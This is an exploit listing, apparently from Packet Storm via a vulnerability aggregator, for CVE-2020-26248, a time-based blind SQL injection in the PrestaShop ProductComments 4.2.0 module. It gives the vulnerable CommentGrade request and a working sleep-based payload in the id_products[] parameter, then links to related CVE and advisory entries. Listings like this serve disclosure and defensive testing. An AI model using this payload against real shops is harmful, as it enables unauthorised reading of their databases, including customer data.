Lucene search
Frederic AdamPACKETSTORM:160539HistoryDec 16, 2020 - 12:00 a.m.
PrestaShop ProductComments 4.2.0 SQL Injection
2020-12-1600:00:00
Frederic Adam
packetstormsecurity.com
176
prestashop
productcomments
sql injection
time based
blind
cve-2020-26248
debian 10
exploit
EPSS
0.019
Percentile
88.5%
`# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Date: 2020-12-15
# Exploit Author: Frederic ADAM
# Author contact: [email protected]
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://github.com/PrestaShop/productcomments
# Version: 4.2.0
# Tested on: Debian 10
# CVE : CVE-2020-26248
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]
Example:
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
`
Related
cve
cve
CVE-2020-26248
2020-12-03 21:15:11
osv
osv
CVE-2020-26248
2020-12-03 21:15:11
Blind SQL injection in PrestaShop productcomments module
2021-01-20 21:33:53
veracode
veracode
SQL Injection
2021-01-21 06:42:10
cvelist
cvelist
CVE-2020-26248 Blind SQL injection during the CommentGrade process
2020-12-03 20:55:13
nvd
nvd
CVE-2020-26248
2020-12-03 21:15:11
github
github
Blind SQL injection in PrestaShop productcomments module
2021-01-20 21:33:53
prion
prion
Sql injection
2020-12-03 21:15:00
exploitdb
exploitdb
nuclei
nuclei
PrestaShop Product Comments <4.2.0 - SQL Injection
2022-09-30 16:27:58
checkpoint_advisories
checkpoint_advisories